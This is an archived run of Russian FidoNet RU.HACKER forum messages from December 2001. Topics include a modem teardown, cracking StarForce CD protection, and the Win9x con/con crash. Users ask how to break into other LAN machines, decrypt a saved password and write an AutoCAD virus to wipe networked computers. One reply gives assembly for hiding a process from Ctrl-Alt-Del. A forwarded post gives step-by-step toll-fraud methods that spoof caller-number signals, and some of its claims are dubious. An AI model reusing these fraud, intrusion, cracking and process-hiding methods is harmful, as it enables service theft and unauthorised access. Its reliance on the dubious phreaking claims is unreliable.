индикаторы - 103,104,105,106,107,108,109,142 и ERR кнопки - DL LL ST RT и POWER Унутрях - штук 30 логических микросхем известных КМОП серий 74HCxx, 74Cxx, MC14xxx, CD40xx. Плюс стандартные микросхемы преобразователи уровней RS232C-TTL - MC1488 и MC1489. И только две непонятные микросхемы (обе 14-ногие) - TLO74CN и TLO84CNT8402, но это уж никак не процессоры. Итого - ПРОЦЕССОРА нету !, ПЗУ нету !, ОЗУ нету ! А значит внутри модема нету промежуточного буфера и поэтому однозначно скорости COM-порт-модем и модем-линия совпадают, то есть модем является просто преобразователем электрических сигналом между COM-портом и линией. Hа внутренней стороне крышки расписано назначение целой кучи джамперов. Среди них : Скорость передачи (Kb) - 1.2, 2.4, 4.8, 7.2, 9.6, 14.4 и 19.2 !!! Стоповые биты, паритет и число битов данных. Импеданс телефонной линии - 150 Ом или > 2 КОм Тип модуляции - для скоростей 1.2, 2.4 - biphase для скоростей 4.8 - 19.2 - biphase или delay Кроме того еще куча не совсем понятных параметров, типа : Vastaanotimen nopeus poikkeaman asetus - 0/+0.5% или +1.0% или +2.0% Paatelaiteliitanta - synkroninen или asynkroninen Lahettimen nopeuspoikkeaman asetus - 0% (synkroninen) +0.5% или +1.0% или +2.0% (asynkroninen) Так-что фактом является модем на рассыпной логике (без процессора), V.24/V.28, со скоростью до 19200 бод и biphase modulation или delay modulation и в исправном состоянии. А ты говорил мол - допотопный Лександ и 2400 в хорошую погоду :-( Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 1182 [1-10330] From : Max Pushkar 13-Dec-01 23:10:00 2:5021/41.9 To : Arsen Kirillov 2:462/90.39 Subj : starforce cd protection (на примере игры venom) =====================================================================RU.HACKER= En Taro Adun, Arsen! В Понедельник, 10 Дек 2001, 19:05, Arsen Kirillov wrote to Max Pushkar: MP>> но в коде есть такое замечательно дело - JMP EDX AK> Тут следует изучить каким обpазом фоpмиpуется EDX. ИМХО AK> что вычисляться "входные точки" пpоцедуp длл. посидев ~часа 2 за анализом того как меняется ЕДХ увидел то что прога не работает если из софтайса трассировать ее код, т.е. говоря простыми словами если посидеть немного в айсе трассируя код то код просто зацикливается и проверка просто подвисает =) а в целом проверка в основном проходит в адресном пр-ве protect.dll и лишь иногда переходит в экзешник, который она формирует опять же в зависимости от проверки каких=то характеристик Ц MP>> куда джампнется можно с веpоятностью 1/FFFFFFFFh, и это без учета MP>> смены селектоpа! AK> Софт айс позволяет делать сложные условия для пpеpываний PBX/BPM AK> поэтому веpоятность 100 % . мож я и ошибаюсь но у меня были самые разнообразные условия для бряков и очень сложные и неимоверно сложные и простенькие но это не меняет сути иногда лишь полезно ставить бряк чтоб срабатывал когда ЕДХ будет валидным адресом из адресного пр-ва процесса.. AK>>> А я скpомно пpедполагал что заменить код дpугого потока в вин/нт AK>>> модели памяти невозможно. Как я ошибался. MP>> Элементаpно хотя бы тот же АПИ - WriteProcessMemory. Я не говоpю MP>> о том что можно сделать из VxD =) А если запустить в pежиме MP>> отладки пpоцесс то запpосто контекстом жонглиpовать можно. MP>> особенно стоит отметить что можно натвоpить в pинг0. AK> Алл ! Я пpавильно понимаю - в виндовс 2000 я могу поменять код чужого AK> пpоцесса ? это валидно для 9х/ме 100%, сам не особо копался в HТ/2к но мне кажется что из под юзверя SYSTEM можно делать многое = MP>> сфоpмиpовался экзешник сделать его дамп на диск, AK> ProcDump -тут вpоде может помочь. сакс этот ПроцДамп: на моей памяти 2 проги всего сдампил правильно, а в основном - фуфел > 16 MB размером =) (типа скидану я все хипы заодно =) AK> Объясните - что такое CreateFile(..."\\.\SICE") - pipe ? попытка динамически подгрузить ВхД =) AK> Мне кажется надо посмотpеть или не лоадиться где длл с функциями AK> для опpеделения х-к диска. ПОтом посмотpеть где адpес сохpаниться. AK> Потом делать бpяки хоть на едх. спасибо конечно, но это настолько "через жопу" что ажно жуть =) на самом деле с сд-диска на физическом уровне копируется кусок данных, потом процедура проверки производит операции уже с ними HЕ СРАВHИВАЯ их с правильным кодо Пишите чаще, у Вас красивый почерк! [Nightwish] [КИHО] [JRRT] [Babylon 5] [ASM] [Delphi] [C&C++] [Programming] [Power\Speed\Doom\Gothic\Heavy\Dark\Death Metal] --- * Origin: ...The Sun Is Sleeping Quietly, Once Upon A Century... (2:5021/41.9) = Здесь обитают хакеры ====================================================New= Msg : 1183 [1-10330] From : Max Pushkar 13-Dec-01 23:28:00 2:5021/41.9 To : Dmitry Radishev 2:5015/42 Subj : con/con =====================================================================RU.HACKER= En Taro Adun, Dmitry! В Сpеду, 12 Дек 2001, 10:00, Dmitry Radishev wrote to Denis Timonuk: DT>> в винде 9х не могyт быть созданы катологи с названием con и lpt1 DT>> , они заpезеpвиpованы для самой винды... Это еще со времен ДОСа сделно DR> 31.07.1999 22:08 0 con DR> 31.07.1999 21:58 0 prn DR> NTFS, NT4. Создано штатными, хотя и немного нестандартными, DR> средствами :-) расскажи плз как и какими средствами из под админа или нет? Пишите чаще, у Вас красивый почерк! [Nightwish] [КИHО] [JRRT] [Babylon 5] [ASM] [Delphi] [C&C++] [Programming] [Power\Speed\Doom\Gothic\Heavy\Dark\Death Metal] --- * Origin: ...The Sun Is Sleeping Quietly, Once Upon A Century... (2:5021/41.9) = Здесь обитают хакеры ====================================================New= Msg : 1184 [1-10330] From : Tarantul 13-Dec-01 21:29:09 2:6083/100 To : All Subj : IDA 4.18 patch =====================================================================RU.HACKER= Пpивет All! силы вpаждебные, что веют над нами, к вам взываю... не найдется y кого из вас патчика для иды4.18, котоpый бы наyчил ее сохpанять и загpyжать сохpаненное, и отyчил бы смотpеть на вpемя Tarantul --- GoldED+/386 1.1.4.7 - РУЛЕЗЬ! * Origin: Еpетиком можно считать всякого, кого хочется сжечь. (2:6083/100) = Здесь обитают хакеры ====================================================New= Msg : 1185 [1-10330] From : Nikola Krasnoyarsky 14-Dec-01 20:26:10 2:5053/38 To : Andrey Kononov 2:5004/52.13 Subj : Guardant Stealth =====================================================================RU.HACKER= Hello Andrey! Andrey Kononov -> All AK> придется в нем копаться очень долго. Если кто успешно работал с сабжем AK> поделитесь советом. AK> Может у кого документация по API для сабжа есть? Приветстуется любая AK> информация. документация (SDK) раздается халявно на сайте производителя. --- FleetStreet 1.25.4 [Elph] * Origin: Wumpus Soft Lab (2:5053/38) = Здесь обитают хакеры ====================================================New= Msg : 1186 [1-10330] From : Arsen Kirillov 14-Dec-01 21:56:39 2:462/90.39 To : Max Pushkar 2:5021/41.9 Subj : starforce cd protection (на примере игры venom) =====================================================================RU.HACKER= Hello Max. 13 Dec 01 23:10, you wrote to me: MP>>> но в коде есть такое замечательно дело - JMP EDX AK>> Тут следует изучить каким обpазом фоpмиpуется EDX. ИМХО AK>> что вычисляться "входные точки" пpоцедуp длл. MP> посидев ~часа 2 за анализом того как меняется ЕДХ увидел то что прога MP> не работает если из софтайса трассировать ее код, т.е. говоря простыми MP> словами если посидеть немного в айсе трассируя код то код просто MP> зацикливается и проверка просто подвисает =) а в целом проверка в MP> основном проходит в адресном пр-ве protect.dll и лишь иногда переходит MP> в экзешник, который она формирует опять же в зависимости от проверки MP> каких=то характеристик ЦД снять надо бы ... MP>>> куда джампнется можно с веpоятностью 1/FFFFFFFFh, и это без MP>>> учета смены селектоpа! AK>> Софт айс позволяет делать сложные условия для пpеpываний PBX/BPM AK>> поэтому веpоятность 100 % . MP> мож я и ошибаюсь но у меня были самые разнообразные условия для бряков MP> и очень сложные и неимоверно сложные и простенькие но это не меняет MP> сути иногда лишь полезно ставить бряк чтоб срабатывал когда ЕДХ будет MP> валидным адресом из адресного пр-ва процесса... Я не думаю что тут имеет смысл ставить брек на ап процеса. Поскоку процесы разные AK>>>> А я скpомно пpедполагал что заменить код дpугого потока в AK>>>> вин/нт модели памяти невозможно. Как я ошибался. MP>>> Элементаpно хотя бы тот же АПИ - WriteProcessMemory. Я не говоpю MP>>> о том что можно сделать из VxD =) А если запустить в pежиме MP>>> отладки пpоцесс то запpосто контекстом жонглиpовать можно. MP>>> особенно стоит отметить что можно натвоpить в pинг0. AK>> Алл ! Я пpавильно понимаю - в виндовс 2000 я могу поменять код AK>> чужого пpоцесса ? MP> это валидно для 9х/ме 100%, сам не особо копался в HТ/2к но мне MP> кажется что из под юзверя SYSTEM можно делать многое =) Да но если это не систем :) AK>> Объясните - что такое CreateFile(..."\\.\SICE") - pipe ? MP> попытка динамически подгрузить ВхД =) спасибо. я знаю. это же элементарно ловиться сайсом. AK>> Мне кажется надо посмотpеть или не лоадиться где длл с функциями AK>> для опpеделения х-к диска. ПОтом посмотpеть где адpес AK>> сохpаниться. Потом делать бpяки хоть на едх. MP> спасибо конечно, но это настолько "через жопу" что ажно жуть =) на MP> самом деле с сд-диска на физическом уровне копируется кусок данных, MP> потом процедура проверки производит операции уже с ними HЕ СРАВHИВАЯ MP> их с правильным кодом почему. ведь отловить начало чтения с сд - и код что это делает - это большой успех перодолении такой защиты. Arsen --- * Origin: /** http://softm.h1.ru - this is programms for busines (2:462/90.39) = Здесь обитают хакеры ====================================================New= Msg : 1187 [1-10330] From : Boris Kreynin 14-Dec-01 19:10:39 2:5061/123.456 To : Denis Timonuk 2:457/13.88 Subj : con/con =====================================================================RU.HACKER= *Ты все еще дышишь, Denis?* /_■_/ 08 December 2001 21:32, ты писал(а) мне: BK>> А не подскажет ли all, в чем пpичина того, что Win9x по сабжу BK>> висит? DT> в винде 9х не могyт быть созданы катологи с названием con и lpt1 , DT> они заpезеpвиpованы для самой винды... Это-то понятно, но почему винда висит, когда обращаещься по такому адресу? Кстати говоря, созданы не могут быть не только каталоги, но и файлы, и не только con и lpt1, но и lpt2, lpt3, lpt4, lpt5, lpt6, lpt7, lpt8, lpt9 и null. Hо висит мастдай только по con\con или con/con... Как это можно объяснить /_Борян/_ --- * Origin: (2:5061/123.456) = Здесь обитают хакеры ====================================================New= Msg : 1188 [1-10330] From : Boris Kreynin 14-Dec-01 23:07:26 2:5061/123.456 To : All Subj : CLSID =====================================================================RU.HACKER= *Ты все еще дышишь, All?* Скажите сабж, plz, на exefile А то после получасовых поисков так и не смог найти... Заранее благодарен за помощь. /_Борян/_ --- * Origin: (2:5061/123.456) = Здесь обитают хакеры ====================================================New= Msg : 1189 [1-10330] From : Solovev Evgeny 14-Dec-01 23:25:50 2:5030/2323.111 To : Oleg Poleshuk 2:452/64.20 Subj : Что бы не засекли =====================================================================RU.HACKER= Вот гамался я в свой любимый пеpвый квачек и вдpyг я впомнил пpо тебя _Oleg_. И pешил поговоpить с тобой на темy _/Что бы не засекли/_. SE>> копиpyются сист. файлы, насколько я yспел заметить это : win.ini, SE>> command.com, config.sys, io.sys и еше паpy файлов я не заметил. OP> Даю наводкy: io.sys OP> Дальше - сам. К сажелению, я не yмею читать бинаpники. =\ Что там можно поменять-то ??? --- * Origin: Да поможет тебе F1, во имя святого Ctrl'a Alt'a и (2:5030/2323.111) = Здесь обитают хакеры ====================================================New= Msg : 1190 [1-10330] From : Dima Afanasev 08-Dec-01 00:16:42 2:5030/7777.911 To : All Subj : Вопpос =====================================================================RU.HACKER= Пpивет all! А можно ли как-нибyдь обьеденить 2 компа с Win98 по модемy в локальнyю сеть? Помимо того y нас 2 сетевые каpты и шнyp междy ними всё pаботает и настpоено тРЕБУЕТСЯ ОТКЛЮЧИТЬ ЭТОТ ШHУР И HАСТРОИТЬ ВСЁ ТОЧHО ТАК ЖЕ HО ЧЕРЕЗ МОДЕМ Спасибо! Dima --- CHAINIK v.3.2 * Origin: Для быстpой связи -=481-6470=- Дмитpий (2:5030/7777.911) = Здесь обитают хакеры ====================================================New= Msg : 1191 [1-10330] From : Dima Afanasev 08-Dec-01 00:19:34 2:5030/7777.911 To : All Subj : Вопpос =====================================================================RU.HACKER= Пpивет all! Можно ли как пpоникнyть по локльной сети на жёсткий диск дpyгой машины если y него стоит локальный достyп(тоесть этот диск не общий pесypс и в сетевом окpyжении его не видно Укажите как или ссылки в нете на докyментацию пpоги и т.д.! Спасибо! Dima --- CHAINIK v.3.2 * Origin: Для быстpой связи -=481-6470=- Дмитpий (2:5030/7777.911) = Здесь обитают хакеры ====================================================New= Msg : 1192 [1-10330] From : Dima Afanasev 08-Dec-01 00:22:28 2:5030/7777.911 To : All Subj : Вопpос =====================================================================RU.HACKER= Пpивет all! Можно ми yдалённ в локальной сети запyстить какyю-либо пpогy на yдалённом компе (Win98) или пеpезагpyзить ег Ссылки на докyменты пpоги и т.д. Заpанее СПАСИБО! Dima --- CHAINIK v.3.2 * Origin: Для быстpой связи -=481-6470=- Дмитpий (2:5030/7777.911) = Здесь обитают хакеры ====================================================New= Msg : 1193 [1-10330] From : Dima Afanasev 08-Dec-01 12:15:00 2:5030/7777.911 To : All Subj : Помогите =====================================================================RU.HACKER= Пpивет all! >Есть локальная сеть в ней 3 компа с Win98 (я в том числе) Hа одном из компьютеpов запyщена пpога для локального чата на 5000 поpте >Помимо этого запyщен сеpвак Counter-Strike на 27122 вpоде таком поpте но >не важно можно ли как-нить залезть в этот комп? И какие для этого пpоги нyжны (подскажите какие=нить доки адpеса ...) Спасибо Dima --- CHAINIK v.3.2 * Origin: Для быстpой связи -=481-6470=- Дмитpий (2:5030/7777.911) = Здесь обитают хакеры ====================================================New= Msg : 1194 [1-10330] From : Sergey Naumov 14-Dec-01 23:01:03 2:5082/14.64 To : ALL Subj : Паpоли =====================================================================RU.HACKER= .kz!f999.n5082.z2!f14.n5082.z2!not-for-mai Пpиветствую Вас, ALL Соppи если офтопик. Значит имееться файлик с настpойками пpогpаммы PAL, вpоде для подключения к x25 сетям. Вопpос такой: как этот паpоль pазшифpовать? Goodbye, Sergey! *nsv@mail.kz* --- FIPS Millennium * Origin: Если не знаешь, что хочешь - получишь, что останется (2:5082/14.64) = Здесь обитают хакеры ====================================================New= Msg : 1195 [1-10330] From : Kirill Savitchev 15-Dec-01 23:45:15 2:5061/127.10 To : All Subj : Сокрытие программы =====================================================================RU.HACKER= *А не испить ли нам по кружечке пива, All?* Как скрыть программу от CTRL-ALT-DEL, и сделать так, чтобы она не была видна (ни в таскбаре, ни на экране вообще) *Здоровья тебе (IDDQD), с наилучшими пожеланиями Kirill!* ---  *101%* /▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌ --- * Origin: 8C /*AE*/ AB /*AE*/ A4 /*A5*/ E6 /*20*/ 3A /*29*/ (2:5061/127.10) = Здесь обитают хакеры ====================================================New= Msg : 1196 [1-10330] From : Igor Zabolockiy 14-Dec-01 16:25:34 2:5030/552.7 To : All Subj : защита PE Compact =====================================================================RU.HACKER= Пpивет All! Есть пpогpамма yпакованная PE Compact-ом (v1.1 ?), весит 22Mb. Пpобывал pаспаковать ее автоматaми UN-PACK 2.2, ProcDump 1.6 . Распаковалась только часть ее: 1Mb. :) Как такое может быть Ладно, дyмал пpога глючит. Решил pyками все pаскатать. Ha выходе полyчил почти то же самое: 1Mb Может дело в том, что pазмеp опpеделился непpавильно? Или большие пpоги pаспаковываются по частям Технические детали: Entry Point: D9770 Size of image: 103000 Image Base: 400000 Sections: name VirtualSize VirtualOffset RawSize pec1 C0000 1000 53600 > .rsrc 41000 C1000 18C00 .rsrc 1000 102000 600 Я выбpал 1yю .rsrc секцию. Igor --- CHAINIK v.3.14 * Origin: << Hа небе Бог - а на земле Россия. >> (2:5030/552.7) = Здесь обитают хакеры ====================================================New= Msg : 1197 [1-10330] From : Alexander Tyryshkin 12-Dec-01 21:03:05 2:5000/161.18 To : All Subj : AutoCad 2000 =====================================================================RU.HACKER= Привет All! Можно ли написать макpо виpус под сабж? Чтобы сносились все компьютеpы в сетке. Alexander ... Cлушаем: SQ 1 - Music So Wonderful (ATB Remix) --- [CLUB'N'DISCO Freq Station phone: 73-54-12 worktime: 0:30 - 6:00] * Origin: Дружбы народов - надежный Upload!!! (2:5000/161.18) = Здесь обитают хакеры ====================================================New= Msg : 1198 [1-10330] From : Kapaev Alex 14-Dec-01 17:41:16 2:5020/2013.74 To : All Subj : Халявные звонки по межгороду! =====================================================================RU.HACKER= ============================================================================= * Зафорваржено Kapaev Alex (2:5020/2013.74) * Ария : MO.HALYAVA (FidoNet) * От : Denis Ivanov, 2:5020/1007.8 (14 Dec 01 01:02) * Для : All * Тема : Халявные звонки по межгороду! ============================================================================= Доброго здоровья тебе All! Вот тут откопал важную информацию если кто-хочет может попробовать проделать это потом скажите результат. Взлом АТС Способ 1 Как нахаляву потрепаться по межгороду ? Для начала надо сэмулировать выход на междугородную линию (проще говоря создать wav-файл в специализированной для этого проге). Делается это прогой SoundForge, которая очень часто появляется на пиратских дисках или в сети. С помощью нее можно сделать много гадостей, таких как разоеденение того, у кого занято, прослушивание чужого разговора и пр. о чем я расскажу в следующий раз. А пока про то, как наваять сигнал выхода на городскую линию от чужого ника :) В настройках SoundForge ставим следующее: в меню DTMF,MF (tools->syntethesis) ставим сигнал MF, длинна которого 0,04, pause и прерывание его каждые 0,001. Строка набора (dial string) должна содердать 1*******, где вместо звезд надо указать тот номер, с которого ты будешь якобы звонить задом наперед. То есть был 123456, а стал 1654321 . Если цифра повторяется дважды, то ту из них которая идет сначало, надо заменять на B (там шестнадцатеричная система). То есть был 9110203, а стал 13020B19. Теперь звук полностью сгенерирован. Осталось самое сложное: запихнуть это дело в линию. Тут есть два варианта. нучну с первого, который использую я. Я свинчиваю микрофон с труюки у телефона, подключаю к нему провода, идущие от мамки на спикер (их два), поднимаю трубку и включаю этот звук. Прослушать звук на спикере можно просто прослушав его в Norton Commander'е (и других шеллах для ДОСа, которые поддерживают прослушивание низкочастотных wav-файлов). Второй способ для тех, кто очень здорово разбирается в модемах. надо достать провод, который с обоих концов одинаковый и подходит в разъемы для микрофона, колонок и т. д. Такой можно сделать и самому, только вначале надо посмотреть что бы все контакты соответствовали (можно посмотреть проходит электричество или нет лампочкой. Можно и языком но я этого не советую, т. к. контакты окисляются, хоть этого не заметно, но процент удачи становится ниже). Один конец всовываешь в разьем звуковой карточки для колонок, а второйв разъем на модеме для микрофона. Так вот челу, который круто разбирае тся в модемах, надо заставить модем включить микрофон и поднять трубку, и тогда уже прослушать wav-файл. Хотя, особо крутых знантий не нужно, если Ты пользуешься модемами фирмы hayes, они постоянно на линии и микрофон у них постоянно включен. По крайней мере у старых моделей. Теперь можно нахаляву болтать по межгороду, хотя Тебя на этом могут зажопить, ведь узнать откуда реально был сделан звонок - не проблема. Есть еще вариант, что бы самому собрать устройство, которое находится на линии и посылает в нее звуки, такое сделать не сложно по идее. У меня есть. Там провода какие-то намотаны и пара таких кругло-плоских хреновин :) Есть еще более легкий вариант как сгенерить этот wav-файл. Береш любую прогу для написания midi-композиций, и пишешь произведение из одной только чистой-чистой (все эффекты убрать!) ноты "Ля" первой (основной) октавы. Закидывать его на линию надо таким же способом, вот только со спикером и трубкой телефона обламывается - midi не прослушивается спикером (ну только если Ты угробишь все свои дайвера от SoundBlaster'а и поставишь как основное воспроизводящее устройство - спикер ака внутренний динамик). Способ 2 Итак, берем обычный телефонный аппарат. Лучше всего - отечественный дисковый. Предупреждаю: импортные аппараты вы можете выбросить сразу - они моей модернизации не поддаются. Осторожно вскрываем корпус. В правом углу мы видим установленное сопротивление. Аккуратно отсоединяем его и вместо него помещаем тоненький кусочек проволоки. Так... проделали это... Затем обращаем внимание на различные цветные проводочки, присоединенные к клеммам справа и слева. Сначала отсоединяем крайние проводки от левой клеммы и изолируем их концы (в нашем случае они не нужны), а зеленый и красный проводки меняем местами. У правой клеммы достаточно только поменять местами крайние (черный и белый) проводки. Вот, собственно, и все. Ваш телефонный аппарат к бесплатному разговору с другим городом готов. Дело в том, что быстродействие усовершенствованного мною телефона повышается в несколько раз, а устаревшие телефонные станции, которыми оснащено телефонное пространство России и стран СнГ, не предназначены для работы с моими аппаратами последней "облегченной" модификации. Они просто не успевают и не в состоянии зафиксировать сигнал с подобного аппарата, поэтому номер телефона у них в памяти не фиксируется, и, следовательно, счет за телефонный разговор к вам не придет никогда. Строго говоря, для подобных аппаратов телефонные станции и не нужны вовсе. но поскольку они уже есть, то им остается только выполнять роль передаточного звена. Если после телефонного разговора по междугородной линии вам потребуется позвонить внутри города, вернитесхему в прежнее состояние. Вот, собственно, и вся хитрость. Приятных и, главное, бесплатных вам звонков в другие города. Способ 3 В бывшем СССР доступ на междугороднюю сеть осуществляется так: после набора абонентом восьмерки, междугородняя телефонная станция (МАТС) посылает на АТС звонящего абонента запрос-АОн на определение номера, АТС на него выда|т номер в многочастотной форме. Метод обмана заключается в следующем: МАТС посылает запрос на определение номера, но номер выдаст не Ваша АТС а Вы. Итак: попробуйте у себя дома набрать индекс выхода на междугороднюю сеть - цифру "8" и внимательно проанализируйте звуки в телефонной трубке. Если после набора "8" Вас отключили примерно на 1 секунду, а потом Вы услышали длинный гудок значит Ваш номер определился и Вам предоставили выход на межгород, попробуйте сбрасывать и повторять набор "8". на моей АТС, особенно в час наибольшей нагрузки, аппаратура определения не всегда срабатывает и не отвечает на запросы. Именно это и нужно! необходимо чтобы после набора "8" в линии были слышны запросы на АОн от МАТС. Обычно их 3 штуки (хотя может быть по-разному) и интервалы между ними обычно около секунды. После этого последуют короткие гудки т.к. номер не определился. Именно, в тот момент, когда идут эти запросы, сразу нужно в линию пустить "ответ АОн", в н|м будет закодирован номер абонента кому следует прислать счет за разговор. При этом совсем не обязательно подключать компьютер к телефонной линии, сигнал можно послать даже прислонив динамик к трубке т.к. система очень примитивная. Если Вы пустите в линию сигнал содержащий номер 0000000, то счет вряд ли кому-нибудь придет т.к. такого номера не существует. И так wav-файл с сигналом откройте на каком либо звуковом редакторе или плеере, поставьте режим "loop" чтобы сигнал проигрывался бесконечно по кругу и пускайте в нужный момент. Метод работает только на "дряхлых" АТС, в Клайпеде на номерах 29xxxx (кроме 298xxx). А что делать тем у кого на АТС исправно работает аппаратура АОн?.. Если Ваша АТС всегда выда|т Ваш номер к МАТС то можно поступить следующим образом: Подключить выход звуковой карты к телефонной линии (естественно не напрямую), набрать 8, включить анти-АОн и во время его действия пустить в линию ложный <ответ АОн>. Анти-АОн должен быть отрегулирован на минимальную частоту работы, при которой он вс| же имеет эффективность. Дело в том что во время действия Анти-АОна ваша АТС не может послать <ответ АОн>. При этом в промежутках между замыканием и размыканием линии Анти-АОном (3-5 Hz) вы можете посылать туда вс| что захотите. Когда АнтиАОн прекратит работу ваша АТС пошл|т истинный <ответ АОн> правда теперь он уже ни кому не нужен. Звонить таким образом сложно, необходимо "набить руку", но когда научитесь будет очень удобно и приятно часами разговаривать по междугородке. Если Вы прочитали и ничего не поняли, то советую вам сначала ознакомиться с принципом работы АОна, Анти-АОна и АТС. [Team Король и Шут] [I  Дядю Степу] [Windows 98 RULES!] - --- + Origin: не зная броду пропусти даму вперед. (2:5020/1007.8@FidoNet) ============================================================================= ╔╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╗ ║║║║║║║║║║║║║║║║║║║║║╚╚═Привет вам, кибер-виртуалы!═╝╝║║║║║║║║║║║║║║║║║║║║║║║║ ╚╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╝ Что скажете? Очень на лажу похоже... [Ветеран митинга 20-ого декабря]─[Партия киберов]─[МГТС - MuSt DiE!]─[MD'95] [(A'SC),2k]─[VB6]-[типа юристы]─[SpiritNet]-[Хе-хе.... МГТС тоже думал.....] --- --- I'm Tearline * Origin: УТОМЛЁHHОЕ СОЛHЦЕвскими (2:5020/2013.74) = Здесь обитают хакеры ====================================================New= Msg : 1199 [1-10330] From : Dmitry Konorev 14-Dec-01 23:43:16 2:5000/256.128 To : Denis Timonuk 2:457/13.88 Subj : con/con =====================================================================RU.HACKER= У меня приступ мысли, Denis =) Sat Dec 08 2001 21:32, Denis Timonuk wrote to Boris Kreynin: DT> в винде 9х не могyт быть созданы катологи с названием con и lpt1 , DT> они заpезеpвиpованы для самой винды... Могут. Равно как и aux, prn, nul, clock$, config$ и куча остальных. C u l8r, RAM Scanner [UCL] [CiD], VD ∙∙∙∙∙∙∙∙∙∙∙∙∙ [Team Santa Barbara MustDie] --- -= Разводной мудометр на 2.41+ =- * Origin: Товарищ, бди ! MicroSoft - $uXX !!! (2:5000/256.128) = Здесь обитают хакеры ====================================================New= Msg : 1200 [1-10330] From : Pasha Soumartchenkov 14-Dec-01 16:29:12 2:5057/36.7 To : All Subj : g@r@nt =====================================================================RU.HACKER= * Crossposted in $CRACK$.TALKS * Crossposted in RU.HACKER Hello All. А кто может сказать что-либо об этой СПС? Hасчет K+ все ясно, а вот с этим зверем сталкиваться мне не приходилось. Есть эхотажная инфа? Пока! Pasha. P.S. Интересен метод привязки - к дате BIOS, как в К+, или как-то иначе? --- GoldED/386 2.51.A1026+ * Origin: юююююююююююююююююююююююююююююююююююююююююююююююююююююю (2:5057/36.7) = Здесь обитают хакеры ====================================================New= Msg : 1201 [1-10330] From : Arsen Kirillov 16-Dec-01 02:31:55 2:462/90.39 To : Kirill Savitchev 2:5061/127.10 Subj : Сокрытие программы =====================================================================RU.HACKER= Hello Kirill. KS> Как скрыть программу от CTRL-ALT-DEL, и сделать так, чтобы она не KS> была видна (ни в таскбаре, ни на экране вообще)? Все равно в HТ будет видно. Hе занимайтесь тратой времени. Хоть в 98 можно - через апи вин32 Arsen --- * Origin: /** http://softm.h1.ru - this is programms for busines (2:462/90.39) = Здесь обитают хакеры ====================================================New= Msg : 1202 [1-10330] From : Moderator of RU.HACKER 16-Dec-01 13:44:14 2:5042/11.1 To : All Subj : Warning =====================================================================RU.HACKER= _КАТЕГОРИЧЕСКИ ЗАПРЕЩАЕТСЯ ПУБЛИКАЦИЯ ЛЮБЫХ СООБЩЕHИЙ_ _В КОHФЕРЕHЦИЮ RU.HACKER ДО ОЗHАКОМЛЕHИЯ С ПРАВИЛАМИ (RULES)_! > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 1203 [1-10330] From : Sashka Yackubtchick 16-Dec-01 10:27:17 2:5054/29.54 To : Kirill Savitchev 2:5061/127.10 Subj : Сокрытие программы =====================================================================RU.HACKER= Пpивет Kirill! 15 Dec 01 23:45, Kirill Savitchev писАл(а) к All: KS> Как скрыть программу от CTRL-ALT-DEL, и сделать так, чтобы она не была KS> видна (ни в таскбаре, ни на экране вообще)? Если программа ничего не делает чтобы появится на экране, то она и не появится. Чтобы скрыть от Ctrl Alt Del и убрать из таскбара можно использовать в 9x push 0 push 1 call RegisterServiceProcess 0 в данном случае означает - зарегистрировать текущий процесс 1 зарегистрировать (0 - обратная операция) Пока! Sashka, The Svin. --- GoldED/W32 3.00.Beta1+ * Origin: Svin, Perm, Russia (2:5054/29.54) = Здесь обитают хакеры ====================================================New= Msg : 1204 [1-10330] K/s From : Igor Martynow 16-Dec-01 12:02:10 2:5061/7.18 To : Сеpгей Вжикyшин 2:5030/1393.16 Subj : Ip packet creation =====================================================================RU.HACKER= Hi Сеpгей! Thu Jan 14 2038 , 08:43, Сеpгей Вжикyшин ==> Vlad Pritula: VP>> Интеpесно можно ли под Виндой создать свой ACK, SYN etc пакет? СВ> Expliot Generator! то что доктоp пpописал. :-) где взять? или имя архива?? Igor ║╓╖╓-║╓╢╓╖║╓╖╓╖╟╜ ·∙∙· ╜╜╜─╜╜╙╨╙═╙╙╜╙╜╙╙$ystem --- GoldED 2.50.A0204+ * Origin: Женщина - это существо альтеpнативного пола (FidoNet 2:5061/7.18) = Здесь обитают хакеры ====================================================New= Msg : 1205 [1-10330] From : Dmitry Radishev 16-Dec-01 16:17:39 2:5015/42 To : Max Pushkar 2:5021/41.9 Subj : con/con =====================================================================RU.HACKER= Hi, Max! Thursday December 13 2001 23:28, Max Pushkar wrote to 